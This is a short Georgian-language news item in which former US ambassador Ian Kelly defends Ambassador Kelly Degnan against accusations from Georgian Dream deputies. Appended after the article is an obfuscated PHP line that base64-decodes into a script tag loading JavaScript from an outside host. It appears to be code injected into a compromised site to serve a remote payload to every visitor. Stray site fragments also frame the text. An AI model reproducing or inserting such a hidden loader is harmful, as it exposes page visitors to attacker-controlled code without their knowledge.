celsiusi
ავერსი საქკაბელი
აშშ-ის ყოფილი ელჩი საქართველოში იან კელი ფორმულას ეთერში, ბოლოდროს კელი დეგნანსა  და "ქართული ოცნების" დეპუტატებს შორის არსებულ ურთიერთობაზე საუბრობს.
 
მისი თქმით, შემაშფოთებელია მოვლენების ამგვარი განვითარება. 
 
"ძალიან შემაშფოთებელი მოვლენების განვითარებაა - მმართველ პარტიაში ხელმძღვანელი პირები აბრალებენ აშშ-ის ელჩს ისეთ რაღაცას, რაც არის სიყალბე. აშშ არც ერთი ფორმით არ ცდილობს საქართველო ჩაითრიოს უკრაინის ომში. ეს გახლავთ მარტივად - სიყალბე. მე სრულიად ვუჭერ მხარს ჩემს მეგობარ ელჩ დეგნანს მხარს და ვცდილობ უარვყო, რომ აშშ-ს გააჩნია რაღაც მსგავსი განზრახვა.
 
 
თუ საქართველოს მთავრობა დაიწყებს ისეთ მოძრაობას, რომელიც შეეწინააღმდეგება აშშ-ის ინტერესებს, დაეხმაროს საქართველოს დამოუკიდებლობის შენარჩუნებაში, მას დახვდება ძალიან ნეგატიური შედეგები" - ამბობს აშშ-ის ყოფილი ელჩი საქართველოში იან კელი.
601
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");